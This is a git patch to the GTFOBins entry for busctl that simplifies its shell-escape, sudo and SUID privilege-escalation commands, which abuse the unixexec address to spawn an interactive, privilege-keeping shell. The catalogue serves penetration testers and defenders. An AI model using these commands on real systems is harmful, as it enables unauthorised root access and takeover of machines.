From a4e55ccd5eb50c799329ac99db5ee5cb8f85cb61 Mon Sep 17 00:00:00 2001 From: Hidehiro Anto Date: Tue, 14 Oct 2025 23:18:14 -0700 Subject: [PATCH] change set-property to list (default) --- _gtfobins/busctl.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/_gtfobins/busctl.md b/_gtfobins/busctl.md index 7b542cf0..e8cf6a66 100644 --- a/_gtfobins/busctl.md +++ b/_gtfobins/busctl.md @@ -6,11 +6,11 @@ functions: busctl --show-machine !/bin/sh - code: | - busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2' + busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2' sudo: - code: | - sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2' + sudo busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2' suid: - code: | - ./busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2' + ./busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2' ---